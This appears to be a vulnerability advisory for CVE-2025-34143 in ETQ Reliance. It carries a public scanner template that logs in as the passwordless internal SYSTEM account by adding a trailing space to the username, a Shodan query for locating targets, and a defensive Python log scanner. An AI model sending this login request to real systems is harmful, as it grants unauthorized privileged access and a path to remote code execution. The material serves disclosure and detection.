CVE-2025-34143: ETQ Reliance - Authentication Bypass via Trailing Space

Date: 2025-08-01 | Affected software: ETQ Reliance | PoC: public

Vulnerability description

An authentication bypass vulnerability exists in ETQ Reliance on the CG (legacy) platform. The application allowed login as the privileged internal SYSTEM user by manipulating the username field. The SYSTEM account does not require a password, enabling attackers with network access to the login page to obtain elevated access. Once authenticated, an attacker could achieve remote code execution by modifying Jython scripts within the application. This issue was resolved by introducing stricter validation logic to exclude internal accounts from public authentication workflows in version MP-4583.

PoC code [public]

id: CVE-2025-34143

info:
  name: ETQ Reliance - Authentication Bypass via Trailing Space
  author: slcyber,DhiyaneshDK
  severity: critical
  description: |
    An authentication bypass vulnerability exists in ETQ Reliance on the CG (legacy) platform. The application allowed login as the privileged internal SYSTEM user by manipulating the username field. The SYSTEM account does not require a password, enabling attackers with network access to the login page to obtain elevated access. Once authenticated, an attacker could achieve remote code execution by modifying Jython scripts within the application. This issue was resolved by introducing stricter validation logic to exclude internal accounts from public authentication workflows in version MP-4583.
  impact: |
    Successful exploitation allows unauthenticated attackers to bypass authentication and gain elevated SYSTEM access, potentially leading to remote code execution.
  remediation: |
    Apply the vendor patch to version MP-4583 or later, which includes stricter validation logic to exclude internal accounts from public authentication workflows.
  reference:
    - https://nvd.nist.gov/vuln/detail/CVE-2025-34143
    - https://slcyber.io/assetnote-security-research-center/how-we-accidentally-discovered-a-remote-code-execution-vulnerability-in-etq-reliance/
  classification:
    epss-score: 0.04443
    epss-percentile: 0.88624
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
    cvss-score: 9.8
    cve-id: CVE-2025-34143
    cwe-id: CWE-287
  metadata:
    verified: true
    max-request: 1
    shodan-query: html:"ETQ Reliance"
  tags: cve,cve2025,etq-reliance,auth-bypass,vkev

variables:
  username: "SYSTEM "
  password: "{{to_lower(rand_text_alphanumeric(7))}}"

http:
  - raw:
      - |
        POST /reliance/resources/sessions HTTP/1.1
        Host: {{Hostname}}
        Accept: application/json, text/plain, */*
        Content-Type: application/json

        {"username":"{{username}}","password":"{{password}}"}

    matchers-condition: and
    matchers:
      - type: word
        part: body
        words:
          - "statusCode"
          - "userId"
        condition: and

      - type: word
        part: content_type
        words:
          - "application/json"
# digest: 4a0a0047304502210090854da02386b0ffb67a7eb92660097575a33bc84114c11c4a3d4797226ef6170220203d6a2160a51a23427200d3fe5675709759dcbc69a3028304fe7ad93f474e89:922c64590222798bb761d5b6d8e72950
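
A defender-side check for the login pattern this template sends, as an added example that is not part of the original page or the template: it scans request records for POSTs to `/reliance/resources/sessions` whose username resolves to the internal SYSTEM account once trimmed. The log schema (`src`, `method`, `path`, `body`), the sample records and the case-insensitive comparison are assumptions.

```python
import json

LOGIN_PATH = "/reliance/resources/sessions"  # endpoint the template posts to
INTERNAL_ACCOUNTS = {"system"}               # the page names only SYSTEM

def classify(username):
    """Return 'padded' or 'plain' if the name resolves to an internal account, else None.
    Assumption: the account lookup ignores surrounding whitespace and case."""
    if not isinstance(username, str):
        return None
    trimmed = username.strip()
    if trimmed.casefold() not in INTERNAL_ACCOUNTS:
        return None
    return "plain" if username == trimmed else "padded"

def suspect_logins(log_lines):
    """Return (src, raw username, class) for login requests naming an internal account."""
    hits = []
    for line in log_lines:
        try:
            rec = json.loads(line)
            body = json.loads(rec.get("body") or "{}")
        except (ValueError, TypeError, AttributeError):
            continue  # unparseable record or body
        if rec.get("method") != "POST" or rec.get("path") != LOGIN_PATH:
            continue
        if not isinstance(body, dict):
            continue
        kind = classify(body.get("username"))
        if kind:
            hits.append((rec.get("src"), body["username"], kind))
    return hits

def _rec(src, method, path, body):
    return json.dumps({"src": src, "method": method, "path": path, "body": body})

# Constructed sample records; the schema is hypothetical.
SAMPLE = [
    _rec("198.51.100.7", "POST", LOGIN_PATH, '{"username":"SYSTEM ","password":"x"}'),
    _rec("192.0.2.10", "POST", LOGIN_PATH, '{"username":"jsmith","password":"x"}'),
    _rec("192.0.2.11", "POST", LOGIN_PATH, '{"username":"SYSTEM","password":"x"}'),
    _rec("192.0.2.12", "GET", "/reliance/", ""),
    _rec("192.0.2.13", "POST", LOGIN_PATH, "not json"),
]

if __name__ == "__main__":
    for hit in suspect_logins(SAMPLE):
        print(hit)
```

Both classes are worth alerting on, since the description states that internal accounts are excluded from public authentication workflows as of MP-4583.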
